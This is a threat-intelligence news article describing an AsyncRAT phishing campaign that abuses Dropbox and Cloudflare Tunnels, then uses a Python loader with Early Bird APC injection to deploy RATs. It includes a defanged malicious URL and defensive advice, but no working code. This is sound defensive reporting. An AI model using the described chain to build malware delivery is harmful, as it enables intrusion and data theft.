AsyncRAT Campaign Exploits Cloudflare Tunnels and Python for Malware Delivery
Key Takeaways A new AsyncRAT campaign leverages legitimate cloud services like Dropbox and Cloudflare Tunnels for stealthy malware delivery. The attack chain begins with phishing emails containing...
Key Takeaways
- A new AsyncRAT campaign leverages legitimate cloud services like Dropbox and Cloudflare Tunnels for stealthy malware delivery.
- The attack chain begins with phishing emails containing fake invoice lures, leading to a multi-stage infection process.
- Attackers use Python scripts and a bundled interpreter to inject various remote access trojans (RATs), including AsyncRAT, VenomRAT, and XWorm, into legitimate Windows processes.
- The campaign highlights a growing trend of threat actors abusing trusted cloud infrastructure to bypass traditional security defenses.
A sophisticated new campaign employing the AsyncRAT remote access trojan has emerged, utilizing a clever tactic to evade detection: leveraging trusted cloud services. Instead of relying on easily identifiable malicious infrastructure, the attackers are delivering their payload via Dropbox links and Cloudflare Tunnels (specifically the TryCloudflare service). This method allows the malware to bypass many conventional security tools that typically do not flag legitimate cloud platforms as threats.
Table Of Content
AsyncRAT itself is a well-known and persistent threat, notorious for its capabilities in espionage, data theft, and remote command execution. What distinguishes this current wave of attacks is its innovative delivery mechanism, which incorporates legitimate cloud infrastructure and a concealed Python package to deploy the final malicious payload.
Security researchers at Forcepoint said in a report that this AsyncRAT campaign bears a strong resemblance to an earlier attack they analyzed in August. The Forcepoint team emphasized that the continued abuse of TryCloudflare validates predictions from their 2025 Future Insights report, which forecast an increase in threat actors misusing legitimate infrastructure to remain undetected.
AsyncRAT Campaign Abuses TryCloudflare Tunnels and Python Scripts
The infection sequence typically begins with a phishing email designed to look like an invoice. These emails feature a button, often in German, prompting the recipient to download an invoice from Dropbox. Clicking this link initiates a series of downloads that ultimately installs AsyncRAT, while simultaneously displaying a convincing fake PDF invoice to the victim, minimizing suspicion.
The initial Dropbox URL leads to a ZIP file. Inside this ZIP file is an internet shortcut (.URL) that, when opened, connects to a specific TryCloudflare subdomain: hxxps[:]//inventory-card-thumbzilla-ip[.]trycloudflare[.]com/DE/. This subdomain then hosts an LNK file.
Executing the LNK file triggers a PowerShell command that downloads a JavaScript file from the same Cloudflare tunnel. This JavaScript file, upon deobfuscation, proceeds to fetch a batch file from the identical infrastructure.
The batch file, heavily obfuscated, orchestrates the core malicious activity. It serves the fake PDF invoice as a distraction, while in the background, it downloads a second ZIP file containing a Python package. The script also performs a check for an existing Python installation; if Python is not found, it deploys a bundled interpreter.
Within this Python package, most of the files are benign setup components. However, a critical element is a script named load.py, which, alongside five binary files, is responsible for executing the actual attack.
Python Loader And Final Payload
When load.py is executed, it leverages the Python ctypes library, which allows it to interact directly with Windows operating system functions. This access is used to allocate memory, create threads, and inject shellcode—classic steps in a process injection attack.
The campaign employs an “Early Bird APC Queue injection” technique. This method involves injecting malicious code into a newly created process before its main thread begins execution, making it significantly harder for antivirus and endpoint detection and response (EDR) solutions to detect and prevent. The specific payload injected varies depending on which binary file is processed:
- One binary injects VenomRAT into the legitimate
notepad.exeprocess. - Another binary injects XWorm.
- The remaining binary files inject AsyncRAT shellcode into
explorer.exe.
All variants of the injected malware establish communication with the same command and control (C2) servers over different ports (3232 and 4056).
Forcepoint reports that its customers are protected at multiple stages of this attack chain, with their solutions capable of blocking the initial phishing attachments, redirect URLs, dropper files, and C2 communication. Furthermore, Forcepoint’s Next-Generation Firewall (NGFW) products are configured by default to terminate LNK file transfers and suspicious PowerShell connections, offering an additional layer of defense.
What You Should Do
- Exercise extreme caution with unexpected emails, especially those related to invoices or urgent downloads, even if they appear to come from known entities.
- Avoid opening ZIP attachments or shortcut files (.LNK, .URL) from unknown or suspicious senders.
- Enable PowerShell logging on endpoints to enhance visibility and aid in early detection of malicious activity.
- Implement robust email filtering and security solutions that can detect and block malicious links and attachments before they reach end-users.
- Ensure endpoint detection and response (EDR) solutions are up-to-date and configured to detect process injection techniques and unusual process behavior.
Threat actors are increasingly exploiting low-cost, disposable cloud infrastructure to deploy information stealers and remote access trojans, making it crucial for organizations to adapt their defenses to this evolving landscape. This trend allows attackers to circumvent traditional blocklists and maintain persistence.
Indicators of Compromise (IoCs):-



No Comment! Be the first one.